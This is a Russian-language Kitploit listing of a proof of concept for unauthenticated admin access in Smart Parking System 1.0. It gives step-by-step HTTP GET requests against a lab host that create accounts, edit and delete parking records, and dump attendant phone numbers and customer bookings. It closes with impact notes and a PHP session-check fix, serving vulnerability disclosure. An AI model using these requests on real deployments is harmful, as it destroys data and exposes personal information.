Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-10243-AUTH — Доказательство концепции, демонстрирующее неаутентифицированный доступ к критическим административным функциям в Smart Parking System 1.0, позволяющий создание учётных записей, манипуляцию данными и раскрытие персональных данных (PII). | Kitploit
Инструменты/GitHubGitHub/xmyronn/cve-2026-10243-auth
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификация
GitHubxmyronn/cve-2026-10243-auth

CVE-2026-10243-AUTH

Доказательство концепции, демонстрирующее неаутентифицированный доступ к критическим административным функциям в Smart Parking System 1.0, позволяющий создание учётных записей, манипуляцию данными и раскрытие персональных данных (PII).

Репозиторий
54 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Smart Parking System 1.0 — Несанкционированный доступ к критическим административным функциям

Информация об уязвимости

ПолеДетали
ПродуктSmart Parking System
Поставщикcode-projects.org
Версия1.0
Класс уязвимостиОтсутствие аутентификации для критической функции (CWE-306)
Идентификатор CVEОжидается
Оценка CVSS9.8 Критическая (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Требуется аутентификацияНет
Затронутые файлыattendant.php, edit.php, basic_table.php, basic_table2.php, admin_request.php

Описание

Smart Parking System 1.0 от code-projects.org не обеспечивает аутентификацию на нескольких конечных точках, доступных только администратору. Неаутентифицированный удалённый злоумышленник может напрямую обращаться к этим конечным точкам без файла cookie сеанса и выполнять привилегированные операции, включая создание учётных записей дежурных, редактирование и удаление записей о парковке, а также просмотр всех персональных данных клиентов и данных о бронировании.

Для эксплуатации этой уязвимости не требуются учётные данные, токен сеанса или взаимодействие с каким-либо легитимным пользователем.


Обзор цепочки атак

root@kitploit:~
Нет учётных данных / нет сеанса
        ↓
Прямой GET-запрос к административным конечным точкам
        ↓
attendant.php     → создание поддельных учётных записей дежурных
edit.php          → чтение и перезапись любой записи о парковке
basic_table.php   → удаление любой записи о парковке
basic_table2.php  → выгрузка всех персональных данных дежурных
admin_request.php → выгрузка всех электронных писем клиентов и данных о бронировании
        ↓
Полная компрометация административных функций

Пошаговое доказательство концепции

Шаг 1 — Подтверждение неаутентифицированного состояния

Откройте новый сеанс браузера без файлов cookie. Перейдите к корню приложения. Отображается страница входа, что подтверждает отсутствие активного сеанса:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/ HTTP/1.1
Host: 192.168.0.9

Шаг 2 — Доступ к панели создания дежурных (без аутентификации)

Перейдите напрямую к конечной точке регистрации дежурных:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/attendant.php HTTP/1.1
Host: 192.168.0.9

Результат: Загружается полная форма «Add Parking Attendant Details» с полями для имени, фамилии, номера мобильного телефона, улицы, имени пользователя и пароля. Злоумышленник может зарегистрировать поддельную учётную запись дежурного с доступом к системе.


Шаг 3 — Чтение и изменение записей о парковке (без аутентификации)

Перейдите напрямую к конечной точке редактирования записей о парковке:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//edit.php?edit=5 HTTP/1.1
Host: 192.168.0.9

Результат: Загружается форма «Update Parkings Details», предварительно заполненная актуальными значениями из базы данных:

root@kitploit:~
City:   Mombasa
Street: Tudor
Slots:  150
Cost:   500

Злоумышленник может перезаписать любое поле и отправить форму, чтобы сохранить изменения непосредственно в базе данных.


Шаг 4 — Удаление записи о парковке (без аутентификации)

Отправьте прямой GET-запрос к конечной точке удаления:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE/basic_table.php?delete=4 HTTP/1.1
Host: 192.168.0.9

Результат: Приложение отвечает:

root@kitploit:~
Parking deleted successfully

Запись безвозвратно уничтожается в базе данных. Не требуется ни аутентификация, ни CSRF-токен, ни запрос подтверждения.


Шаг 5 — Выгрузка всех дежурных по парковке (без аутентификации)

Перейдите напрямую к конечной точке списка дежурных:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//basic_table2.php HTTP/1.1
Host: 192.168.0.9

Результат: Возвращается полный список дежурных, включая имена, номера мобильных телефонов и закреплённые улицы:

root@kitploit:~
karis  kelvin  070824555  msa
king   doshi   0708009360 Nairobi
james  peter   0708009360 vol
tset   test    0708009360 tset

Шаг 6 — Выгрузка всех данных о бронировании клиентов (без аутентификации)

Перейдите напрямую к конечной точке административных запросов на бронирование:

root@kitploit:~
GET /SMART_PARKING_SYSTEM_IN_PHP_WITH_SOURCE_CODE//admin_request.php HTTP/1.1
Host: 192.168.0.9

Результат: Возвращаются все записи о бронировании клиентов, включая электронные письма, слоты, часы и стоимость:

root@kitploit:~
[email protected]   slots:4  hours:2  cost:4000  status:requested
[email protected]   slots:1  hours:6  cost:1200  status:Completed
[email protected]    slots:1  hours:2  cost:1000  status:requested
[email protected]       slots:1  hours:1  cost:500   status:requested
[email protected]        slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:1  cost:500   status:requested
[email protected]    slots:1  hours:3  cost:0     status:requested
[email protected]       slots:1  hours:2  cost:1000  status:requested

Воздействие

  • Полный доступ к административной панели — все привилегированные функции доступны без каких-либо учётных данных
  • Уничтожение данных — любая запись о парковке может быть безвозвратно удалена
  • Манипулирование данными — любая запись о парковке может быть изменена
  • Повышение привилегий — можно создавать поддельные учётные записи дежурных с доступом к системе
  • Раскрытие персональных данных — собираются все электронные письма клиентов и история бронирований
  • Утечка данных дежурных — раскрывается полный список, включая имена и номера телефонов

Сводка затронутых файлов

ФайлУязвимость
attendant.phpНеаутентифицированное создание учётных записей дежурных
edit.phpНеаутентифицированный доступ на чтение/запись к записям о парковке
basic_table.phpНеаутентифицированное удаление записей о парковке
basic_table2.phpНеаутентифицированный доступ к полным персональным данным дежурных
admin_request.phpНеаутентифицированный доступ ко всем данным о бронировании клиентов

Устранение

Добавьте проверку аутентификации сеанса в начало каждого PHP-файла, ориентированного на администратора:

root@kitploit:~
session_start();
if (!isset($_SESSION['admin']) || $_SESSION['admin'] !== true) {
    header("Location: index.php");
    exit();
}

Ссылки

  • Домашняя страница поставщика
  • CWE-306: Отсутствие аутентификации для критической функции
  • OWASP: Нарушенный контроль доступа

Обнаружитель

  • Исследователь: Imad Alvi
Скачать инструмент